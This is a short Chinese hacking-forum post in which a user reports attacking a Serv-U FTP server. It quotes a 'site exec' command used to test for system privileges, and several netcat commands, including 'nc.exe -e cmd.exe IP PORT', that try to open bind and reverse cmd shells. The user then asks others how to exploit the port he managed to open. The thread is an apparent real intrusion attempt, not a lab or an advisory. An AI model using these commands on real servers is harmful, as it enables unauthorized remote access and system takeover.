标叔

引用:
引用第7楼hack520于2007-12-29 09:05发表的 :
先确定一下serv-u是否以系统权限启动
quote site exec echo zhu>c:windowszhu.txt

如果文件存在,则是以系统权限启动.windows2003 默认情况下windows目录不会给你乱丢东西的.当然除了某些猪管理乱配权限.

.......
谢谢这位大哥的思路，但我未成功，估计是我笨吧。
先确定一下serv-u是否以系统权限启动
执行
ftp> quote site exec echo zhu>c:windowszhu.txt
501 Cannot EXEC command line (error=2).
返回这个。他应该在C盘做了权限的设置。或者就是那该死的麦咖啡。
然后我用NC反弹，我试了以下几串命令
C:\Inetpub\nc.exe -l -p 1001 -e C:\Inetpub\cmd.exe 构造telnet,没有任何反映
C:\Inetpub\nc.exe -e cmd.exe IP PORT 反弹cmdshell,没有任何反映
C:\Inetpub\nc.exe -vv -l -p 1001 监听端口，则1001端口终于开放。但是我不知道这个我该如何利用了？

哎，我太菜，希望指教。
帖子12 精华0 积分44 阅读权限40 在线时间47 小时 注册时间2007-3-9 最后登录2008-6-14 查看详细资料引用 报告 回复 TOP

sunue
晶莹剔透§烈日灼然